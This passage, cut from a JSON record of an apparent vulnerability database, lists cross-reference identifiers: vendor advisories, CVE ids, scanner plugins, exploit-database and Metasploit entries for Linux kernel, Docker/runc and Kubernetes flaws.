"PHSA-2019-3.0-0001", "PHSA-2019-3.0-0003", "PHSA-2019-3.0-0019", "PHSA-2020-0085", "PHSA-2020-0123", "PHSA-2020-0140", "PHSA-2020-0142", "PHSA-2020-0168", "PHSA-2020-0235", "PHSA-2020-0264", "PHSA-2020-0270", "PHSA-2020-0282", "PHSA-2020-0301", "PHSA-2020-0323", "PHSA-2020-0325", "PHSA-2020-1.0-0264", "PHSA-2020-1.0-0292", "PHSA-2020-1.0-0323", "PHSA-2020-1.0-0325", "PHSA-2020-2.0-0235", "PHSA-2020-2.0-0270", "PHSA-2020-2.0-0282", "PHSA-2020-2.0-0285", "PHSA-2020-2.0-0301", "PHSA-2020-3.0-0085", "PHSA-2020-3.0-0123", "PHSA-2020-3.0-0140", "PHSA-2020-3.0-0142", "PHSA-2020-3.0-0168", "PHSA-2021-0007", "PHSA-2021-4.0-0007", "PHSA-2022-0374", "PHSA-2022-0456"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1ECEF05BCE67BDE50D7D24223957B465", "QUALYSBLOG:C34329319F801C91B20EF858C729A35D"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:0F6591D77D4CBF34DE05F02E4D29B606"]}, {"type": "redhat", "idList": ["RHSA-2016:2098", "RHSA-2016:2105", "RHSA-2016:2106", "RHSA-2016:2107", "RHSA-2016:2110", "RHSA-2016:2118", "RHSA-2016:2120", "RHSA-2016:2124", "RHSA-2016:2126", "RHSA-2016:2127", "RHSA-2016:2128", "RHSA-2016:2132", "RHSA-2016:2133", "RHSA-2017:0372", "RHSA-2018:0180", "RHSA-2018:0475", "RHSA-2018:2906", "RHSA-2018:2908", "RHSA-2018:3537", "RHSA-2018:3549", "RHSA-2018:3551", "RHSA-2018:3598", "RHSA-2018:3624", "RHSA-2018:3742", "RHSA-2018:3752", "RHSA-2018:3754", "RHSA-2019:0303", "RHSA-2019:0304", "RHSA-2019:0401", "RHSA-2019:0408", "RHSA-2019:0975", "RHSA-2019:1910", "RHSA-2019:2594", "RHSA-2019:2661", "RHSA-2019:2682", "RHSA-2019:2690", "RHSA-2019:2726", "RHSA-2019:2766", "RHSA-2019:2769", "RHSA-2019:2796", "RHSA-2019:2817", "RHSA-2019:2861", "RHSA-2019:2925", "RHSA-2019:2939", "RHSA-2019:2955", "RHSA-2019:2966", "RHSA-2019:3131", "RHSA-2019:3132", "RHSA-2019:3239", "RHSA-2019:3245", "RHSA-2019:3265", "RHSA-2019:3811", "RHSA-2019:3892", "RHSA-2019:3905", "RHSA-2019:3906", "RHSA-2019:4018", "RHSA-2019:4019", "RHSA-2019:4020", "RHSA-2019:4021", "RHSA-2019:4040", "RHSA-2019:4041", "RHSA-2019:4042", "RHSA-2019:4045", "RHSA-2019:4269", "RHSA-2019:4273", "RHSA-2019:4352", "RHSA-2020:0406", "RHSA-2020:0727", "RHSA-2020:0922", "RHSA-2020:0983", "RHSA-2020:1445", "RHSA-2020:2067", "RHSA-2020:2412", "RHSA-2020:2413", "RHSA-2020:2565", "RHSA-2020:2653", "RHSA-2020:2795", "RHSA-2020:2796", "RHSA-2020:2799", "RHSA-2020:2861", "RHSA-2020:2863", "RHSA-2020:2870", "RHSA-2020:2926", "RHSA-2020:2927", "RHSA-2020:2992", "RHSA-2020:3183", "RHSA-2020:3184", "RHSA-2020:3196", "RHSA-2020:3197", "RHSA-2020:3519", "RHSA-2020:3520", "RHSA-2020:3579", "RHSA-2020:3580", "RHSA-2020:3808", "RHSA-2020:3809", "RHSA-2020:4286", "RHSA-2020:4287", "RHSA-2020:4289", "RHSA-2020:4331", "RHSA-2020:4332", "RHSA-2020:5199", "RHSA-2021:0079", "RHSA-2021:3915", "RHSA-2022:2183"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-1000405", "RH:CVE-2017-1002101", "RH:CVE-2018-1002105", "RH:CVE-2018-15664", "RH:CVE-2018-18955", "RH:CVE-2019-11253", "RH:CVE-2019-13139", "RH:CVE-2019-14271", "RH:CVE-2019-5736", "RH:CVE-2019-9512", "RH:CVE-2019-9514", "RH:CVE-2020-14298", "RH:CVE-2020-14386", "RH:CVE-2020-15257", "RH:CVE-2020-8554", "RH:CVE-2020-8557", "RH:CVE-2020-8558"]}, {"type": "saint", "idList": ["SAINT:1E3BA1480EBC78481EFFC9BD1CFFBBE2", "SAINT:24BDE9528F493A62492AC5847ED078BA", "SAINT:ACA0D81E9F0D7499A5952D634DA1559F", "SAINT:D99FE3AF85FA3F5D4D5C3CB8B43F5183"]}, {"type": "securelist", "idList": ["SECURELIST:6587E154415DCFE54C414013E959C540", "SECURELIST:B700542D10BA5EEA36C5D69A24B3C6EE"]}, {"type": "seebug", "idList": ["SSV:92488", "SSV:96908"]}, {"type": "slackware", "idList": ["SSA-2016-305-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:2583-1", "OPENSUSE-SU-2016:2584-1", "OPENSUSE-SU-2016:2625-1", "OPENSUSE-SU-2016:2649-1", "OPENSUSE-SU-2019:0170-1", "OPENSUSE-SU-2019:0201-1", "OPENSUSE-SU-2019:0208-1", "OPENSUSE-SU-2019:0252-1", "OPENSUSE-SU-2019:0295-1", "OPENSUSE-SU-2019:1079-1", "OPENSUSE-SU-2019:1227-1", "OPENSUSE-SU-2019:1275-1", "OPENSUSE-SU-2019:1444-1", "OPENSUSE-SU-2019:1481-1", "OPENSUSE-SU-2019:1499-1", "OPENSUSE-SU-2019:1506-1", "OPENSUSE-SU-2019:1621-1", "OPENSUSE-SU-2019:2000-1", "OPENSUSE-SU-2019:2021-1", "OPENSUSE-SU-2019:2044-1", "OPENSUSE-SU-2019:2056-1", "OPENSUSE-SU-2019:2072-1", "OPENSUSE-SU-2019:2085-1", "OPENSUSE-SU-2019:2114-1", "OPENSUSE-SU-2019:2115-1", "OPENSUSE-SU-2019:2130-1", "OPENSUSE-SU-2019:2245-1", "OPENSUSE-SU-2019:2286-1", "OPENSUSE-SU-2020:0554-1", "OPENSUSE-SU-2020:1379-1", "OPENSUSE-SU-2020:1382-1", "OPENSUSE-SU-2020:1655-1", "OPENSUSE-SU-2021:0242-1", "OPENSUSE-SU-2021:0278-1", "SUSE-SU-2016:2585-1", "SUSE-SU-2016:2592-1", "SUSE-SU-2016:2593-1", "SUSE-SU-2016:2596-1", "SUSE-SU-2016:2614-1", "SUSE-SU-2016:2629-1", "SUSE-SU-2016:2630-1", "SUSE-SU-2016:2631-1", "SUSE-SU-2016:2632-1", "SUSE-SU-2016:2633-1", "SUSE-SU-2016:2634-1", "SUSE-SU-2016:2635-1", "SUSE-SU-2016:2636-1", "SUSE-SU-2016:2637-1", "SUSE-SU-2016:2638-1", "SUSE-SU-2016:2655-1", "SUSE-SU-2016:2657-1", "SUSE-SU-2016:2658-1", "SUSE-SU-2016:2659-1", "SUSE-SU-2016:2673-1", "SUSE-SU-2016:3069-1", "SUSE-SU-2016:3304-1"]}, {"type": "symantec", "idList": ["SMNTC-109636", "SMNTC-109637", "SMNTC-111109", "SMNTC-111263", "SMNTC-1389"]}, {"type": "talosblog", "idList": ["TALOSBLOG:07D81B04EFE21AC0E3C8DD9F1F76E7A4", "TALOSBLOG:F543D5FEAB2BB1C90B9699F8AE8757F4"]}, {"type": "thn", "idList": ["THN:1F1264BE105BBA74057A5E702B33D71F", "THN:6681D64EFC53E13356AF1184CE1D6024", "THN:B0FC327500C590C565FC4F46D8DCDD34", "THN:B571C1AAA8CDDC10150ABA0BF22B19E6", "THN:DDCD24E4C2A9F0AC7C70DEBAA1C0C02C", "THN:E1BBDEC03BFACEE731E20A3BE9FFD214", "THN:F6202F3C31F7C788D1830F976D0B2464"]}, {"type": "threatpost", "idList": ["THREATPOST:014BB554F1AB256390A14556D7332A31", "THREATPOST:1E49E6FDCFC70F7E7BB2A2CB4EC19F68", "THREATPOST:1EFFF77A39E186D173F6DF0D1259D4DE", "THREATPOST:28F667D81C6074266934A97C7BE4DE9B", "THREATPOST:370E8753340A65AA22C611DB35A611BA", "THREATPOST:4855D753AD8D155F3665D0814ABB393B", "THREATPOST:639EA1C04C8045117A5A3480A9967CB7", "THREATPOST:9148FADE9CE4769DE623F3FA5AC6A18F", "THREATPOST:932AA74F12B9D2AD0E8589AC1A2C1438", "THREATPOST:A28CC7C8B76DAF5EBFF24CE8575A2087", "THREATPOST:AAD833DA9CB72C65E36AA2758E011A09", "THREATPOST:B3BA1E2BDAE404AB09829F90C4A42D56", "THREATPOST:B4C48A638705549FED64000361BA8526", "THREATPOST:DFF8ED339B7012ECBA9C67651AC4441A", "THREATPOST:E5B29B24D99DF66802D64661812BCFB9", "THREATPOST:E93AC619BDDF02C02A7FBD40832CCC5E", "THREATPOST:FC19D0DEB6098A46E54D73010204C32B"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A8C47E018FA9A3D0723FC3A99FD592A7", "TRENDMICROBLOG:DD93FD0A6FE52A3DFF89C6F550E981D1"]}, {"type": "ubuntu", "idList": ["LSN-0071-1", "LSN-0072-1", "USN-3104-1", "USN-3104-2", "USN-3105-1", "USN-3105-2", "USN-3106-1", "USN-3106-2", "USN-3106-3", "USN-3106-4", "USN-3107-1", "USN-3107-2", "USN-3832-1", "USN-3833-1", "USN-3835-1", "USN-3836-1", "USN-3836-2", "USN-4048-1", "USN-4308-1", "USN-4489-1", "USN-4653-1", "USN-4653-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-5195", "UB:CVE-2017-1002101", "UB:CVE-2018-1002105", "UB:CVE-2018-15664", "UB:CVE-2018-18955", "UB:CVE-2019-11253", "UB:CVE-2019-12499", "UB:CVE-2019-13139", "UB:CVE-2019-14271", "UB:CVE-2019-5736", "UB:CVE-2019-9512", "UB:CVE-2019-9514", "UB:CVE-2020-14298", "UB:CVE-2020-14386", "UB:CVE-2020-15257", "UB:CVE-2020-8554", "UB:CVE-2020-8557", "UB:CVE-2020-8558"]}, {"type": "veracode", "idList": ["VERACODE:20891", "VERACODE:20925", "VERACODE:21424", "VERACODE:21426", "VERACODE:21604", "VERACODE:25723", "VERACODE:25751", "VERACODE:25844", "VERACODE:26976", "VERACODE:28056", "VERACODE:29105"]}, {"type": "virtuozzo", "idList": ["VZA-2017-109", "VZA-2017-110", "VZA-2017-111", "VZA-2018-004", "VZA-2019-008"]}, {"type": "vmware", "idList": ["VMSA-2016-0018", "VMSA-2016-0018.3", "VMSA-2019-0001", "VMSA-2019-0001.3"]}, {"type": "zdt", "idList": ["1337DAY-ID-25943", "1337DAY-ID-25944", "1337DAY-ID-25952", "1337DAY-ID-26429", "1337DAY-ID-26430", "1337DAY-ID-26431", "1337DAY-ID-26446", "1337DAY-ID-31636", "1337DAY-ID-31692", "1337DAY-ID-31840", "1337DAY-ID-31841", "1337DAY-ID-32165", "1337DAY-ID-32182", "1337DAY-ID-33028", "1337DAY-ID-33029", "1337DAY-ID-33033", "1337DAY-ID-33034", "1337DAY-ID-36499"]}]}, "score": {"value": 0.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "almalinux", "idList": ["ALSA-2019:2925"]}, {"type": "alpinelinux", "idList": ["ALPINE:CVE-2019-9512"]}, {"type": "amazon", "idList": ["ALAS-2019-1156", "ALAS-2019-1245", "ALAS-2019-1270", "ALAS-2019-1316", "ALAS2-2019-1272", "ALAS2-2020-1488"]}, {"type": "androidsecurity", "idList": ["ANDROID:2016-12-01"]}, {"type": "apple", "idList": ["APPLE:B7EC2E92CBEF4481D5F2735898CA5FE4", "APPLE:HT210436"]}, {"type": "archlinux", "idList": ["ASA-201610-11", "ASA-201610-14", "ASA-201610-16"]}, {"type": "attackerkb", "idList": ["AKB:3C42D63D-858B-4BE3-8C0E-3423577B453B"]}, {"type": "canvas", "idList": ["PROCFS"]}, {"type": "centos", "idList": ["CESA-2016:2098", "CESA-2016:2105", "CESA-2016:2124"]}, {"type": "cert", "idList": ["VU:243144", "VU:605641"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0203", "CPAI-2019-1443"]}, {"type": "cisco", "idList": ["CISCO-SA-20190215-RUNC"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:06094473CAEAE018F16A4156F4D14103", "CFOUNDRY:1CA625F1FA872E0AB995AFC970D36DBC"]}, {"type": "coalfire", "idList": ["COALFIRE:D93AAC6D87124CC1032AC4DDE0C8780E"]}, {"type": "cve", "idList": ["CVE-2017-1002101", "CVE-2018-1002105", "CVE-2018-15664", "CVE-2019-13139", "CVE-2019-5736", "CVE-2019-9512", "CVE-2019-9514"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4503-1:6B94A", "DEBIAN:DSA-4508-1:2E656", "DEBIAN:DSA-4520-1:26CCF", "DEBIAN:DSA-4521-1:FBAB8", "DEBIAN:DSA-4669-1:2AD2E"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-15664", "DEBIANCVE:CVE-2019-13139", "DEBIANCVE:CVE-2019-14271", "DEBIANCVE:CVE-2020-15257"]}, {"type": "exploitdb", "idList": ["EDB-ID:45886", "EDB-ID:45915", "EDB-ID:46369", "EDB-ID:47164", "EDB-ID:47165", "EDB-ID:47166", "EDB-ID:47167"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:27BBE2C0B861B43954ED29F30415313B", "EXPLOITPACK:6987711F7515BF1BA7025F22C1A40644", "EXPLOITPACK:956C5219D3B18D5E3A8A5BE9918D3BE1", "EXPLOITPACK:A525E32FDF6F1ECE16D67E1741C48E11"]}, {"type": "f5", "idList": ["F5:K01988340", "F5:K39103040", "F5:K46011592", "F5:K46421255", "F5:K50233772", "F5:K98053339", "SOL10558632"]}, {"type": "fedora", "idList": ["FEDORA:0456260427FD", "FEDORA:1308F60C4220", "FEDORA:1E5DF60CC4A6", "FEDORA:1EC0F60C8AD5", "FEDORA:23B4B60D1C89", "FEDORA:28217613F7D7", "FEDORA:3A64160C815D", "FEDORA:421346101A44", "FEDORA:60A1A6076012", "FEDORA:813AC604EC12", "FEDORA:86E49602F5A7", "FEDORA:D0736603EB7F", "FEDORA:E1B606076F4E", "FEDORA:E84586030F6B"]}, {"type": "fortinet", "idList": ["FG-IR-19-225"]}, {"type": "freebsd", "idList": ["41F4BAAC-BF77-11E9-8D2F-5404A68AD561", "72A5579E-C765-11E9-8052-0028F8D09152", "73B1E734-C74E-11E9-8052-0028F8D09152", "9FBAEFB3-837E-11EA-B5B4-641C67A117D8", "C97A940B-C392-11E9-BB38-000D3AB229D6"]}, {"type": "gentoo", "idList": ["GLSA-202003-21", "GLSA-202105-33"]}, {"type": "github", "idList": ["GHSA-36XW-FX78-C5R4", "GHSA-PMQP-H87C-MR78"]}, {"type": "githubexploit", "idList": ["05A9BE7D-0317-5F20-87C1-D63BA3A06BE4", "1BB3E3DD-F59A-5A19-A6FD-5C20AD2531A3", "2747307D-D8C7-5045-A017-AA9E18552C41", "2F6984D3-FD79-5AB7-A71D-43FF8E8DABBF", "38F2629A-330D-5488-A1E9-B85A647EE2FD", "49F291AB-38E4-506D-A185-70178D091F27", "51C8D6A4-47A9-5CDF-B833-7159E9EC70EE", "6D9188F6-8329-5A5F-8C00-BA11D76DCC8A", "6FE4C3C0-D500-5202-A7DB-D2A17693D071", "7BF9A69C-010C-5E27-AFF1-BD5C35E75269", "7C6B3B7F-060E-52A2-98DE-429893092989", "7E3511B5-C528-5213-B2AD-D36D4F8ACC95", "89C838C0-79FF-5954-84E9-527AC74184B4", "A10132DA-F650-5163-A3F9-DBE973D0187D", "C493E2BD-3B57-5FD7-BFB9-B71408617084", "CC081819-FE94-5E7C-AF61-E00A82E76DE2", "D438FC99-880C-54A1-AE03-121CCA980E24", "E5C9B17F-EC84-52B1-8901-335B1815C813", "EEEB5AA5-1DFC-529A-A0F1-D4D66C503664"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:60F2E118E85CB34AAEEAED9DE88D51AF"]}, {"type": "hackerone", "idList": ["H1:495495"]}, {"type": "ibm", "idList": ["2E0D3D0CF86F6C48B680F76C93BAE1886AC182B679AAB019C0AA49D79D2D84BA", "2F7D9559AE426A44085F66D3B32DC79DBD644723F26961D9815EF3606625EE87", "4CE6EF5A931E1DD71173744E63FA5B598713F2EB1EFE22E55E4D35D7659268AA", "5ADDCDCCBCAA61DA8CF5B02CB5B449E5A5F2BFFE2D509DF07ECBF25E4F3493E4", "A74B562A201F87B6DD98C72FFCBAB42E5DCAEC6CE62FE82E7BC4B489D6AF2349", "D123779355BC4ABF556BE1CB1C0AC3B3376DE0C5AEACD6468D7153F832BCE791", "E5236E91681D8FBF63527B2F5A703EFE433AABE71FC32A8CA3F3B468E9DFBA61", "E82785235072F5EF5FCC205CE14F01F22FB4483D23ECF18B1C4AED471927B7FC"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:5FB4BD7D34290CD0DF514F5CBED8F4CB"]}, {"type": "kaspersky", "idList": ["KLA11513", "KLA11534"]}, {"type": "kitploit", "idList": ["KITPLOIT:216801248370103608", "KITPLOIT:8250648883616491970"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1A0558E103585383F84E3D6A1AD1518E"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/LOCAL/DOCKER_RUNC_ESCAPE/", "MSF:EXPLOIT/LINUX/LOCAL/NESTED_NAMESPACE_IDMAP_LIMIT_PRIV_ESC"]}, {"type": "mscve", "idList": ["MS:CVE-2018-15664", "MS:CVE-2019-9512", "MS:CVE-2019-9514"]}, {"type": "myhack58", "idList": ["MYHACK58:62201892318", "MYHACK58:62201994377", "MYHACK58:62201995518"]}, {"type": "nessus", "idList": ["ALA_ALAS-2016-757.NASL", "ALA_ALAS-2019-1156.NASL", "ARISTA_EOS_SA0043.NASL", "CENTOS_RHSA-2016-2098.NASL", "CENTOS_RHSA-2016-2105.NASL", "DEBIAN_DLA-670.NASL", "DEBIAN_DSA-3696.NASL", "DEBIAN_DSA-4669.NASL", "EULEROS_SA-2019-1061.NASL", "FEDORA_2016-C3558808CD.NASL", "FEDORA_2016-DB4B75B352.NASL", "FEDORA_2018-16C8FDF9B8.NASL", "FEDORA_2018-2BFBD27A0B.NASL", "FEDORA_2018-314913636B.NASL", "FEDORA_2018-9B965C4EED.NASL", "FEDORA_2019-352D4B9CD8.NASL", "FEDORA_2019-3F19F13ECD.NASL", "FEDORA_2019-829524F28F.NASL", "FEDORA_2019-963EA958F9.NASL", "FEDORA_2019-DF2E68AA6B.NASL", "FEDORA_2019-F455EF79B8.NASL", "FEDORA_2019-FD9345F44A.NASL", "FREEBSD_PKG_9FBAEFB3837E11EAB5B4641C67A117D8.NASL", "GENTOO_GLSA-202003-21.NASL", "JUNIPER_JSA11167.NASL", "KUBE_1_12_3.NASL", "OPENSUSE-2016-1211.NASL", "OPENSUSE-2016-1212.NASL", "OPENSUSE-2019-1079.NASL", "OPENSUSE-2019-1275.NASL", "OPENSUSE-2019-1444.NASL", "OPENSUSE-2019-1481.NASL", "OPENSUSE-2019-1499.NASL", "OPENSUSE-2019-1621.NASL", "OPENSUSE-2019-2000.NASL", "OPENSUSE-2019-201.NASL", "OPENSUSE-2019-2021.NASL", "OPENSUSE-2019-2044.NASL", "OPENSUSE-2019-2056.NASL", "OPENSUSE-2019-2072.NASL", "OPENSUSE-2019-208.NASL", "OPENSUSE-2019-2085.NASL", "OPENSUSE-2019-2114.NASL", "OPENSUSE-2019-2115.NASL", "OPENSUSE-2019-2130.NASL", "OPENSUSE-2019-2245.NASL", "OPENSUSE-2019-252.NASL", "OPENSUSE-2019-295.NASL", "ORACLELINUX_ELSA-2016-2098.NASL", "ORACLELINUX_ELSA-2016-2105.NASL", "ORACLELINUX_ELSA-2016-3632.NASL", "ORACLELINUX_ELSA-2016-3633.NASL", "ORACLELINUX_ELSA-2016-3634.NASL", "ORACLELINUX_ELSA-2019-0975.NASL", "ORACLELINUX_ELSA-2019-2726.NASL", "ORACLELINUX_ELSA-2019-2925.NASL", "ORACLELINUX_ELSA-2019-4680.NASL", "ORACLELINUX_ELSA-2021-9203.NASL", "ORACLEVM_OVMSA-2016-0149.NASL", "ORACLEVM_OVMSA-2016-0150.NASL", "PHOTONOS_PHSA-2018-2_0-0112_KUBERNETES.NASL", "PHOTONOS_PHSA-2019-1_0-0202_KUBERNETES.NASL", "PHOTONOS_PHSA-2020-1_0-0292_DOCKER.NASL", "PHOTONOS_PHSA-2020-2_0-0235_DOCKER.NASL", "PHOTONOS_PHSA-2020-3_0-0085_DOCKER.NASL", "REDHAT-RHSA-2016-2098.NASL", "REDHAT-RHSA-2016-2105.NASL", "REDHAT-RHSA-2016-2106.NASL", "REDHAT-RHSA-2016-2107.NASL", "REDHAT-RHSA-2016-2110.NASL", "REDHAT-RHSA-2016-2118.NASL", "REDHAT-RHSA-2016-2120.NASL", "REDHAT-RHSA-2018-0475.NASL", "REDHAT-RHSA-2018-2906.NASL", "REDHAT-RHSA-2018-2908.NASL", "REDHAT-RHSA-2018-3537.NASL", "REDHAT-RHSA-2018-3549.NASL", "REDHAT-RHSA-2018-3551.NASL", "REDHAT-RHSA-2018-3598.NASL", "REDHAT-RHSA-2018-3624.NASL", "REDHAT-RHSA-2018-3742.NASL", "REDHAT-RHSA-2018-3752.NASL", "REDHAT-RHSA-2018-3754.NASL", "REDHAT-RHSA-2019-0303.NASL", "REDHAT-RHSA-2019-0304.NASL", "REDHAT-RHSA-2019-0408.NASL", "REDHAT-RHSA-2019-0975.NASL", "REDHAT-RHSA-2019-1910.NASL", "REDHAT-RHSA-2019-2661.NASL", "REDHAT-RHSA-2019-2682.NASL", "REDHAT-RHSA-2019-2690.NASL", "REDHAT-RHSA-2019-2726.NASL", "REDHAT-RHSA-2019-2769.NASL", "REDHAT-RHSA-2019-2817.NASL", "REDHAT-RHSA-2019-2925.NASL", "REDHAT-RHSA-2019-3131.NASL", "REDHAT-RHSA-2019-3132.NASL", "REDHAT-RHSA-2019-3239.NASL", "REDHAT-RHSA-2019-3245.NASL", "REDHAT-RHSA-2019-3265.NASL", "SL_20161024_KERNEL_ON_SL7_X.NASL", "SL_20161025_IMPORTANT__KERNEL_ON_SL6_X.NASL", "SUSE_SU-2016-2585-1.NASL", "SUSE_SU-2016-2592-1.NASL", "SUSE_SU-2016-2593-1.NASL", "SUSE_SU-2016-2596-1.NASL", "SUSE_SU-2016-2614-1.NASL", "SUSE_SU-2016-2657-1.NASL", "SUSE_SU-2019-0362-1.NASL", "SUSE_SU-2019-0495-1.NASL", "SUSE_SU-2019-1234-2.NASL", "SUSE_SU-2019-1562-1.NASL", "SUSE_SU-2019-2117-1.NASL", "SUSE_SU-2019-2213-1.NASL", "SUSE_SU-2019-2214-1.NASL", "SUSE_SU-2019-2223-1.NASL", "SUSE_SU-2019-2254-1.NASL", "SUSE_SU-2019-2259-1.NASL", "SUSE_SU-2019-2260-1.NASL", "UBUNTU_USN-3104-1.NASL", "UBUNTU_USN-3105-1.NASL", "UBUNTU_USN-3105-2.NASL", "UBUNTU_USN-3106-1.NASL", "UBUNTU_USN-3106-2.NASL", "UBUNTU_USN-3106-3.NASL", "UBUNTU_USN-3106-4.NASL", "UBUNTU_USN-3107-1.NASL", "UBUNTU_USN-3107-2.NASL", "UBUNTU_USN-3832-1.NASL", "UBUNTU_USN-3833-1.NASL", "UBUNTU_USN-3835-1.NASL", "UBUNTU_USN-3836-1.NASL", "UBUNTU_USN-3836-2.NASL", "UBUNTU_USN-4048-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310141997", "OPENVAS:1361412562310142683", "OPENVAS:1361412562310142793", "OPENVAS:1361412562310143069", "OPENVAS:1361412562310704390", "OPENVAS:1361412562310704503", "OPENVAS:1361412562310704508", "OPENVAS:1361412562310704520", "OPENVAS:1361412562310704521", "OPENVAS:1361412562310704669", "OPENVAS:1361412562310815431", "OPENVAS:1361412562310815432", "OPENVAS:1361412562310815433", "OPENVAS:1361412562310815434", "OPENVAS:1361412562310815435", "OPENVAS:1361412562310815436", "OPENVAS:1361412562310815437", "OPENVAS:1361412562310843839", "OPENVAS:1361412562310843840", "OPENVAS:1361412562310843841", "OPENVAS:1361412562310843842", "OPENVAS:1361412562310843843", "OPENVAS:1361412562310844086", "OPENVAS:1361412562310852299", "OPENVAS:1361412562310852308", "OPENVAS:1361412562310852319", "OPENVAS:1361412562310852335", "OPENVAS:1361412562310852379", "OPENVAS:1361412562310852536", "OPENVAS:1361412562310852585", "OPENVAS:1361412562310852679", "OPENVAS:1361412562310852683", "OPENVAS:1361412562310852691", "OPENVAS:1361412562310852697", "OPENVAS:1361412562310852699", "OPENVAS:1361412562310874425", "OPENVAS:1361412562310875467", "OPENVAS:1361412562310875472", "OPENVAS:1361412562310875473", "OPENVAS:1361412562310875482", "OPENVAS:1361412562310876715", "OPENVAS:1361412562310876717", "OPENVAS:1361412562310876722", "OPENVAS:1361412562310876757", "OPENVAS:1361412562310876760", "OPENVAS:1361412562310876761", "OPENVAS:1361412562310876762", "OPENVAS:1361412562310876766", "OPENVAS:1361412562310876767", "OPENVAS:1361412562310876768", "OPENVAS:1361412562310876772", "OPENVAS:1361412562310876892", "OPENVAS:1361412562310876912", "OPENVAS:1361412562310877499"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-2098", "ELSA-2016-2105", "ELSA-2016-3632", "ELSA-2016-3633", "ELSA-2016-3634", "ELSA-2019-0975", "ELSA-2019-2726", "ELSA-2019-2925", "ELSA-2019-4540", "ELSA-2019-4546", "ELSA-2019-4550", "ELSA-2019-4551", "ELSA-2019-4680", "ELSA-2019-4756", "ELSA-2019-4813", "ELSA-2019-4816", "ELSA-2020-0348", "ELSA-2020-1379", "ELSA-2020-1926", "ELSA-2020-5654", "ELSA-2021-9203"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:150489", "PACKETSTORM:163339"]}, {"type": "pentestit", "idList": ["PENTESTIT:17F601961ADDD644F762D2266795C05F"]}, {"type": "photon", "idList": ["PHSA-2018-0112", "PHSA-2018-2.0-0112", "PHSA-2019-1.0-0202", "PHSA-2019-1.0-0208", "PHSA-2019-1.0-0238", "PHSA-2019-2.0-0128", "PHSA-2019-2.0-0129", "PHSA-2019-2.0-0161", "PHSA-2019-2.0-0162", "PHSA-2019-2.0-0193", "PHSA-2019-3.0-0001", "PHSA-2019-3.0-0003", "PHSA-2019-3.0-0019", "PHSA-2020-0270", "PHSA-2020-0282", "PHSA-2020-0285", "PHSA-2020-0301", "PHSA-2020-1.0-0264", "PHSA-2020-1.0-0292", "PHSA-2020-1.0-0323", "PHSA-2020-1.0-0325", "PHSA-2020-2.0-0235", "PHSA-2020-2.0-0270", "PHSA-2020-2.0-0282", "PHSA-2020-2.0-0285", "PHSA-2020-2.0-0301", "PHSA-2020-3.0-0085", "PHSA-2020-3.0-0123", "PHSA-2020-3.0-0140", "PHSA-2020-3.0-0142", "PHSA-2020-3.0-0168", "PHSA-2021-4.0-0007"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1ECEF05BCE67BDE50D7D24223957B465", "QUALYSBLOG:C34329319F801C91B20EF858C729A35D"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:0F6591D77D4CBF34DE05F02E4D29B606"]}, {"type": "redhat", "idList": ["RHSA-2016:2098", "RHSA-2016:2105", "RHSA-2016:2107", "RHSA-2018:0475", "RHSA-2018:2906", "RHSA-2018:2908", "RHSA-2018:3537", "RHSA-2018:3549", "RHSA-2018:3551", "RHSA-2018:3598", "RHSA-2018:3624", "RHSA-2018:3752", "RHSA-2018:3754", "RHSA-2019:1910", "RHSA-2019:2925", "RHSA-2019:3239", "RHSA-2019:4020", "RHSA-2020:4286"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-15257", "RH:CVE-2020-8554"]}, {"type": "saint", "idList": ["SAINT:ACA0D81E9F0D7499A5952D634DA1559F"]}, {"type": "securelist", "idList": ["SECURELIST:B700542D10BA5EEA36C5D69A24B3C6EE"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:2583-1", "OPENSUSE-SU-2016:2584-1", "OPENSUSE-SU-2019:0170-1", "OPENSUSE-SU-2019:0201-1", "OPENSUSE-SU-2019:0208-1", "OPENSUSE-SU-2019:0252-1", "OPENSUSE-SU-2019:0295-1", "OPENSUSE-SU-2019:1079-1", "OPENSUSE-SU-2019:1444-1", "OPENSUSE-SU-2019:1481-1", "OPENSUSE-SU-2019:1499-1", "OPENSUSE-SU-2019:1506-1", "OPENSUSE-SU-2019:1621-1", "OPENSUSE-SU-2019:2000-1", "OPENSUSE-SU-2019:2021-1", "OPENSUSE-SU-2019:2044-1", "OPENSUSE-SU-2019:2056-1", "OPENSUSE-SU-2019:2072-1", "OPENSUSE-SU-2019:2085-1", "OPENSUSE-SU-2019:2114-1", "OPENSUSE-SU-2019:2115-1", "OPENSUSE-SU-2019:2130-1", "OPENSUSE-SU-2019:2245-1", "OPENSUSE-SU-2019:2286-1", "OPENSUSE-SU-2020:0554-1", "SUSE-SU-2016:2585-1", "SUSE-SU-2016:2592-1", "SUSE-SU-2016:2593-1", "SUSE-SU-2016:2596-1", "SUSE-SU-2016:2614-1", "SUSE-SU-2016:2629-1", "SUSE-SU-2016:2630-1", "SUSE-SU-2016:2631-1", "SUSE-SU-2016:2634-1", "SUSE-SU-2016:2635-1", "SUSE-SU-2016:2637-1", "SUSE-SU-2016:2638-1", "SUSE-SU-2016:2657-1"]}, {"type": "symantec", "idList": ["SMNTC-109636"]}, {"type": "talosblog", "idList": ["TALOSBLOG:07D81B04EFE21AC0E3C8DD9F1F76E7A4", "TALOSBLOG:F543D5FEAB2BB1C90B9699F8AE8757F4"]}, {"type": "thn", "idList": ["THN:B0FC327500C590C565FC4F46D8DCDD34", 